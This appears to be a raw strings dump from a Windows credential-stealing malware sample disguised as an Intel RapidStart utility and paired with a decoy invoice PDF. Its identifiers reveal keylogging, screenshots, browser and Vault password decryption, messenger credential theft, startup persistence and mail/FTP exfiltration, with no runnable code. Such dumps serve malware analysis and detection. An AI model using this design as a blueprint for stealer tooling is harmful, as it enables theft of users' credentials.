hwndParent
$:HzkP!
}>}:	<I
i3|o~C:
IAsyncResult
IBrowser
ICredentials
ICredentialsByHost
ICryptoTransform
.idata
Identity
IDisposable
idThread
" id="W5M0MpCehiHzreSzNTczkc9d"?>
i@e 0y
IEnumerable`1
IEnumerator
IEnumSTATURL
IExplore
IFormatProvider
iii;;;
IIITTT
I?|KU*
ImageFormat
IMessenger
ImplicitUseKindFlags
ImplicitUseTargetFlags
InAttribute
inData
IndexOf
InfBlocks
InfCodes
inflate
Inflate
inflateEnd
inflate_fast
inflate_flush
inflateInit
inflate_mask
inflateReset
inflateSetDictionary
inflateSync
inflateSyncPoint
inflate_trees_bits
inflate_trees_dynamic
inflate_trees_fixed
INFNAN
InfTree
	Inherited
init_block
InitBlock
InitializeArray
InitializeCriticalSection
INIT_STATE
inputBytes
InputLanguage
InputLanguageCollection
inputStream
in_Renamed
Insert
InstantHandleAttribute
InstantiatedNoFixedConstructorSignature
InstantiatedWithFixedConstructorSignature
IntelRapidStart
IntelRapidStart.exe
IntelRapidStarts\
IntelRS.exe
IntelRS.exe.config
InterfaceTypeAttribute
InterlockedDecrement
InterlockedIncrement
Internal
InternetCloseHandle
InternetConnectA
InternetCookieHttponly
InternetCookieThirdParty
InternetExplorer
InternetFindNextFileA
InternetFlagRestrictedZone
InternetFlags
InternetGetCookieEx
InternetGetCookieExW
InternetOpenA
InternetReadFile
InternetWriteFile
Interrupt
interval
IntPtr
Invoke
InvokerParameterNameAttribute
IOException
IP9tu/
IPAddress
IPEndPoint
IPGlobalProperties
IPHostEntry
<Ip>k__BackingField
=?=I=S=[=a=o=
IsClipboardFormatAvailable
IsExist
IsHtml
<IsHtml>k__BackingField
IsInRole
IsKeyLocked
_isLoaded
ISLoaded
IsMatch
IsNull
IsNullOrEmpty
_isSqliteExist
isSslEnabled
_isSslEnabled
IsSslEnabled
<IsSslEnabled>k__BackingField
istate
IsUserAdministrator
ITransferProtocol
Itself
IUrlHistoryStg2
IWebProxy
iWk7bO
Jd<\N;
|jl?EJ
jZXi}9
*<!!<K
k2GV<wx{
kernel32
kernel32.dll
_keyBuffer
_keylogger
Keylogger
_keyLoggerEnabled
KeyLoggerProc
_keyloggerTransferBufferEvent
_keyLoggerValue
_keyLogIsLimitedBySize
keylogSizely
keyName
KidOWs
kill.me
KWindows
~KxI[)
K?,(y3j
k.]ZoE
last_eob_len
last_flush
last_lit
_lastPath
_lastProcWindow
_lastUrl
LayoutKind
lcodes
L_CODES
l_desc
LeaveCriticalSection
LENEXT
length
Length
<</Length 3618/Subtype/XML/Type/Metadata>>stream
_length_code
LENGTH_CODES
_level
<</Linearized 1/L 78948/O 12/E 74391/N 1/T 78644/H [ 490 172]>>
List`1
lit_bufsize
literal
LITERALS
l>K`<K
LLL```
lm_init
loadCerts
LoadLibrary
LoadLibraryA
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
LocalizationRequiredAttribute
LocalMachine
Locked
logMode
_logMode
longest_match
lookahead
lpClassName
lpEnumFunc
lpKeyState
lpStaturl
lpString
lpszClass
lpszWindow
lpWindowName
+|LPxy
/L>=RH,kxY
LrI[[W
lstrcpynA
lstrlenA
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
ltree_index
?;?]?l?z?
;<M21K
M2Ec;I6
M5=WqF
M9<]B?J
MachineInfo
MailAddress
MailAddressCollection
MailMessage
MapVirtualKey
marker
Marshal
MarshalAsAttribute
match_available
matches
match_length
match_start
MAX_BITS
MAX_BL_BITS
max_chain
max_chain_length
max_code
max_lazy
max_lazy_match
max_length
MAX_MATCH
MAX_MEM_LEVEL
MAX_WBITS
m/d/yy
MeansImplicitUseAttribute
MemberInfo
Members
memLevel
memoryStream
MemoryStream
MessageBoxA
messenger
MessengerInfo
MessengerStream
<</Metadata 2 0 R/PageLabels 6 0 R/Pages 8 0 R/Type/Catalog>>
method
METHOD
$$method0x60000ba-1
$$method0x60001e9-1
$$method0x60001e9-2
$$method0x6000235-1
$$method0x6000235-2
$$method0x6000236-1
$$method0x6000238-1
$$method0x6000238-2
$$method0x6000238-3
$$method0x6000238-4
$$method0x6000238-5
$$method0x6000238-6
$$method0x6000239-1
$$method0x6000239-2
$$method0x6000239-3
$$method0x6000239-4
$$method0x6000239-5
$$method0x6000239-6
$$method0x6000239-7
$$method0x6000239-8
	Microsoft
Microsoft.Win32
Mini.Basics
Mini.Exceptions
MIN_LOOKAHEAD
MIN_MATCH
Mismatch
Misuse
mmmm d, yyyy
:mm:ss
<Module>
Module32First
Module32FirstW
Module32Next
Module32NextW
MonitorUrl
Mosaic
MoveNext
Mozilla
Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)
mscoree.dll
mscorlib
 >}mslM
MulticastDelegate
_mustUploadDir
>)?M?Y?r?|?
<Name>k__BackingField
nameSubstring
NativeMethods
nativestring
nativestringlen
nAXu<W
nBytes
nDataOffset
NeedMore
Netscape
Netscp6
NetworkAccess
NetworkCredential
next_in
next_in_index
NextMatch
next_out
next_out_index
nice_length
nice_match
nLength
nMaxCount
nnnGGG
noheader
nomoreinput
NotADb
NotFound
Notice
NotifyPropertyChangedInvocatorAttribute
NotImplementedException
NotNullAttribute
nowrap
:N$pG]
NSSBase64_DecodeBuffer
NSS_Init
nStart
number
>">\>.?n?v?
NW:J_U
=.>N>z>
o3C3OfIg
OBF*z^
object
Object
o%Dfg>F
offset
OJ*v7ly
oleaut32.dll
OpenClipboard
OpenSubKey
op_Equality
OperatingSystem
op_Explicit
op_GreaterThanOrEqual
op_Inequality
opt_len
oqME'tZc:
o_qyc_o
origin
OsOperation
OutAttribute
outData
outItemOpt
output
OutputDebugStringA
out_Renamed
outStream
<.=O=Y=
;O|yh?
-P	1+f
PADPADP
ParameterizedThreadStart
parameterName
ParameterName
<ParameterName>k__BackingField
parameters
passEntry
passphrase
Passphrase
PassStream
password
_password
Password
<Password>k__BackingField
<Path>k__BackingField
PathReferenceAttribute
pathToExtract
pceltFetched
pchCookieData
%PDF-1.5
         <pdf:Producer>Acrobat Distiller 9.0.0 (Windows)</pdf:Producer>
pending
pending_buf
pending_buf_size
pending_out
Pidgin
PixelFormat
PK11_Authenticate
PK11_GetInternalKeySlot
PK11SDR_Decrypt
plainBytes
pocsTitle
pocsUrl
poctNotify
<Port>k__BackingField
Position
poszFilter
ppenum
ppvOut
pqdownheap
P.reloc
PreserveSigAttribute
PRESET_DICT
prev_length
prev_match
priode
<PrivateImplementationDetails>{41D9F9B2-94F5-46A8-BC04-8E798788FEC7}
Process
Process32First
Process32FirstW
Process32Next
Process32NextW
Process for Windows
processId
processName
ProcessName
procName
Program
Protect
ProtectedData
Protocol
P.rsrc
ptrRemain
PtrToStringUni
PtrToStructure
PublicAPIAttribute
punkIsFolder
PureAttribute
put_byte
put_short
putShortMSB
pvCallback
pvParam
PwcsTitle
PwcsUrl
pwszBuff
&$P@%Y
qaItHE~
:):Q:e: ;g;
<;qg/q}t
QQQQQQSVW3
QQQQQSVW
QQQQQSVW3
QueryUrl
q YgT6
RaiseException
RapidStartTech.stl
RapidStartu
RazorSectionAttribute
            </rdf:Alt>
            <rdf:Alt>
      </rdf:Description>
      <rdf:Description rdf:about=""
               <rdf:li>KANG</rdf:li>
               <rdf:li xml:lang="x-default">Microsoft Word - SPC-993NS(2018)-Invoice-140220-RMB</rdf:li>
   </rdf:RDF>
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
            </rdf:Seq>
            <rdf:Seq>
ReadAllBytes
ReadAllLines
ReadAllText
read_buf
ReadBuffer
ReadByte
ReadFile
ReadFully
ReadInput
ReadOnly
ReadOnlyCollectionBase
ReadRow
ReadToEnd
ReadWrite
Rectangle
ReferenceEquals
RegCloseKey
RegexOptions
Registry
RegistryKey
RegistryValueKind
RegOpenKeyExA
RegQueryValueExA
@.reloc
remoteVersion
REP_3_6
Replace
REPZ_11_138
REPZ_3_10
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
required
Required
<Required>k__BackingField
reserved
ResetPath
Resize
resourceCulture
resourceMan
ResourceManager
Resources
result
__result
Rfc2898DeriveBytes
rg%Cc'
Rijndael
RijndaelCrypto
RmFsc2U=
RMini.Basics
RSDST^-
`.rsrc
RtlUnwind
r#tm-|
R)&TO<9i
RunKeylogger
RunScreenshot
RuntimeCompatibilityAttribute
Runtime error     at 00000000
RuntimeFieldHandle
RuntimeHelpers
RuntimeTypeHandle
S"%2Z-%R
sAscii
sbase64
scan_tree
Schema
Screen
_screenCounter
_screenInterval
_screenShot
ScreenShot
_screenshotEnabled
screenShotEvent
_screenShotEvent
ScreenShotProc
_screenshotTransferBufferEvent
SearchOption
searchPattern
SECItemData
SECItemLen
SECItemType
    </security>
    <security>
SecurityCriticalAttribute
SecurityIdentifier
SeekOrigin
Select
SelectSingleNode
send_all_trees
send_bits
send_code
sender
SendMessageA
send_tree
serverIp
ServerUrl
<ServerUrl>k__BackingField
set_Accounts
set_AnonymousProperty
set_Attachments
set_BasePath
set_BaseType
set_Body
set_CheckCharacters
set_ClassName
set_Comment
set_ConnectionType
set_ContentLength
set_ContentType
set_Contract
set_Credentials
set_Culture
set_data_type
set_dictionary
set_Enabled
set_EnableSsl
set_Encoding
SetEndOfFile
SetFilePointer
SetFilter
set_FlushMode
set_ForceFullStates
set_FormatParameterName
set_From
set_Handle
set_Host
set_HostKey
set_Indent
set_IndentChars
set_InnerText
set_Ip
set_IsBodyHtml
set_IsHtml
set_IsSslEnabled
set_IV
set_KeepAlive
set_Key
SetLength
set_Method
SetMethodRequiresCwd
set_Name
set_ParameterName
set_Password
set_Path
set_Port
set_Position
set_Proxy
set_Required
set_ServerUrl
SetStartup
set_Subject
set_TargetFlags
set_Title
set_To
set_Url
set_UseBinary
set_UseKindFlags
set_UsePassive
set_Username
set_Value
SetValue
set_Version
set_VisitCount
SharedCache
shfolder.dll
SHGetFolderPathA
s$[%/Irx
SizeOf
SizeofStaturl
smaller
SmtpClient
%s not found.
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
sourceStream
sourceString
sourceText
sourceTextReader
s,`Ovm
SPC-993NS(2018)-Invoice-140220-RMB.pdf
SpecialFolder
_sqlConnection
sqlite3_close
sqlite3_close_v2
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_count
sqlite3_column_name
sqlite3_column_text
sqlite3_column_type
sqlite3.dll
sqlite3_exec
sqlite3_finalize
sqlite3_open_v2
sqlite3_prepare
sqlite3_reset
sqlite3_step
SqliteDll
SqLiteErrorCode
SQLiteFinish
sqliteLibraryPath
SqLiteOpenFlagsEnum
SqLiteProvider
_sqlModule
sqlstr
%s|%s=%s
sssBBB
%s|%s=%s=%s
Stack`1
StartBypass
    <startup> 
      </startup>
_startupEnabled
StartupKey
startxref
stat_desc
__StaticArrayInitTypeSize=1152
__StaticArrayInitTypeSize=116
__StaticArrayInitTypeSize=120
__StaticArrayInitTypeSize=124
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=19
__StaticArrayInitTypeSize=256
__StaticArrayInitTypeSize=384
__StaticArrayInitTypeSize=512
__StaticArrayInitTypeSize=6144
__StaticArrayInitTypeSize=68
__StaticArrayInitTypeSize=76
static_bl_desc
static_d_desc
static_dtree
static_l_desc
static_len
static_ltree
static_tree
StaticTree
STATIC_TREES
Staturl
status
Stealer
Stealer.Annotations
Stealer.Browser
Stealer.Common
Stealer.Communicator
Stealer.Compression
Stealer.ConfigManager
Stealer.Cryptography
Stealer.exe
Stealer.KeyLogger
Stealer.Messenger
Stealer.Model
Stealer.Properties
Stealer.Properties.Resources.resources
Stealer.SQLite
Stealer.SystemInfo
Stealer.Update
STORED
STORED_BLOCK
stored_len
strategy
_strategy
Stream
StreamReader
String
StringBuilder
StringComparison
StringFormatMethodAttribute
StringOperation
#Strings
StringSplitOptions
StringX
strSql
strstart
StructLayoutAttribute
subject
_subject
Subject
<Subject>k__BackingField
Substring
SupportClass
        <supportedRuntime version="v1.0.3705"/>
        <supportedRuntime version="v1.1.4322"/>
		<supportedRuntime version="v2.0.50727"/>
		<supportedRuntime version="v4.0"/>
SuppressUnmanagedCodeSecurityAttribute
SW50ZWxSUy5leGU=
SymmetricAlgorithm
sync_point
SysAllocStringLen
SysConst
SysFreeString
SysInfo
SysInfo*.Enc
SysInfoStream
SysInit
SysReAllocStringLen
System
]System.Attribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
System.CodeDom.Compiler
System.Collections
System.Collections.Generic
System.Collections.ObjectModel
System.ComponentModel
System.Diagnostics
System.Drawing
System.Drawing.Imaging
System.Globalization
System.IO
System.Net
System.Net.Mail
System.Net.NetworkInformation
System.Net.Sockets
System.Reflection
System.Resources
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Runtime.InteropServices.ComTypes
System.Security
System.Security.Cryptography
System.Security.Permissions
System.Security.Principal
System.Text
System.Text.RegularExpressions
System.Threading
System.Timers
System.Windows.Forms
System.Xml
SysUtils
<:<T<{<
<*t"<0r=<9w9i
target
targetFlags
TargetFlags
<TargetFlags>k__BackingField
tCommunication.Intf
TDDEClient
tDhLI@
tDhXS@
td_index
	TErrorRec
TExceptRec
TextReader
	TFileName
TGUIDArray
!This program cannot be run in DOS mode.
This program must be run under Win32
Thread
Thread32First
Thread32Next
ThreadStart
_timeElapsed
timerBufferTransfer_Elapsed
timerKeyMine_Elapsed
timerScreenShot_Elapsed
TimeZone
TInterfacedObject
<Title>k__BackingField
TlHelp32
tl_index
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
ToArray
ToBase64String
TObject
ToByteArray
ToCharArray
ToInt32
ToInt64
<To>k__BackingField
TooBig
Toolhelp32ReadProcessMemory
ToString
TotalExceptionHandler
total_in
TotalIn
total_out
TotalOut
ToUnicode
ToUnicodeEx
ToUtf8
_tr_align
Transfer
\Transfer
Transfer.dll
transferProtocol
_transferProtocol
tree_index
_tr_flush_block
tr_init
_tr_stored_block
_tr_tally
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
TSearchRecX
TsecItem
TShFolder
TStringDynArray
TStrList
tttccc
tWWWWW
]txxxt
TypeAffinity
U1BDLTk5M05TKDIwMTgpLUludm9pY2UtMTQwMjIwLVJNQi5wZGY=
U3RlYWxlckRhdGFc
uaf(bl
UB<A6oLt
uFormat
UInt32
~?u k_O
uMapType
UMr'du+
UnauthorizedAccessException
UnhandledExceptionEventArgs
UnhandledExceptionEventHandler
UnhandledExceptionFilter
Uninitialized
Unknown
UnmanagedFunctionPointerAttribute
UnmanagedType
Unprotect
Update
updateLink
UploadData
UploadFile
UriComponents
UriFormat
UriSchemeFtp
UriToString
UrlHistory
<Url>k__BackingField
UrlMonitor
URShift
UsedImplicitlyAttribute
useKindFlags
UseKindFlags
<UseKindFlags>k__BackingField
user32.dll
User32.dll
username
Username
<Username>k__BackingField
UTF8Encoding
utf8Filename
Utf8ToString
UTypes
uuq/JO
UUUQQQXXX%%%YYY~~~
v?\0~~
v2.0.50727
_value
value__
<Value>k__BackingField
value_Renamed
values
ValueType
vaultcli.dll
VaultCloseVault
VaultEnumerateItems
VaultEnumerateVaults
VaultFree
VaultGetItem
VaultOpenVault
V:?dKE
version
Version
<Version>k__BackingField
version_Renamed_Field
VHJ1ZQ==
VirtualAlloc
VirtualFree
VirtualQuery
VisitCount
<VisitCount>k__BackingField
vvv!!!___
WaitForExit
WaitHandle
WaitOne
Warning
w_bits
WebClient
WebException
WebPermission
WebProxy
WebRequest
WebResponse
wFlags
WideCharToMultiByte
window
Window
windowBits
windowName
WindowOperation
WindowsBuiltInRole
WindowsIdentity
window_size
WindowsPrincipal
?WinInet
wininet.dll
WithMembers
WkN[G;L{
w_mask
\;~w_P
Wq~Qn^~
WrapNonExceptionThrows
WriteAllBytes
WriteByte
WriteEndAttribute
WriteEndElement
WriteFile
writer
WriteStartAttribute
WriteStartElement
WriteString
wScanCode
w_size
wVirtKey
WWR67QVW{y
WWW555
WWW_GetWindowInfo
<X=\=`=d=h=l=p=t=x=|=
X)I)B>==
xj(Fwh
;*;?;X;^;l;r;z;
XmlDocument
XmlNode
XmlNodeType
            xmlns:dc="http://purl.org/dc/elements/1.1/">
            xmlns:pdf="http://ns.adobe.com/pdf/1.3/">
            xmlns:xmp="http://ns.adobe.com/xap/1.0/">
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/">
XmlReader
XmlTextReader
<?xml version="1.0"?>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
XmlWriteAttributeAndValue
XmlWriteElementAndValues
XmlWriter
XmlWriterSettings
         <xmp:CreateDate>2014-02-20T16:24:21+09:00</xmp:CreateDate>
         <xmp:CreatorTool>PScript5.dll Version 5.2.2</xmp:CreatorTool>
         <xmpMM:DocumentID>uuid:26cb151a-722c-4002-b51b-eff684c0d93b</xmpMM:DocumentID>
         <xmpMM:InstanceID>uuid:42b1a799-504a-4ee3-878c-e3425b271023</xmpMM:InstanceID>
         <xmp:ModifyDate>2014-02-20T16:24:21+09:00</xmp:ModifyDate>
XNYiZE[U[
<?xpacket begin="
<?xpacket end="w"?>
xV r^Z
</x:xmpmeta>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.1-c041 52.342996, 2008/05/07-20:48:00        ">
xxxlll,,,333+++
	XZX}:
	XZX}9
y=3*k|
yahooId
YahooMessenger
_yahooPasswordKey
_yahooRegistryKey
_yahooSavePassword
_yahooUsernameKey
YahooVersionKey
%yg3 {
!Y`j	 
_ymsgAuthKey
_^[YY]
YZ]_^[
>`z 16
}$z3z+
Z_ASCII
Z_BEST_COMPRESSION
Z_BEST_SPEED
Z_BINARY
Z_BUF_ERROR
Z_DATA_ERROR
Z_DEFAULT_COMPRESSION
Z_DEFAULT_STRATEGY
Z_DEFLATED
Z{)E]h
z_errmsg
Z_ERRNO
ZF6.'@oy
Z_FILTERED
Z_FINISH
Z_FULL_FLUSH
Z_HUFFMAN_ONLY
ZInputStream
zlibConst
Z_MEM_ERROR
Z_NEED_DICT
Z_NO_COMPRESSION
Z_NO_FLUSH
ZOutputStream
Z_PARTIAL_FLUSH
ZStream
Z_STREAM_END
Z_STREAM_ERROR
ZStreamException
Z_SYNC_FLUSH
ZTUWVSPRTj
Z_UNKNOWN
Z_VERSION_ERROR
=@=Z=x=
~ZY45>
...ZZZ
zzzCCC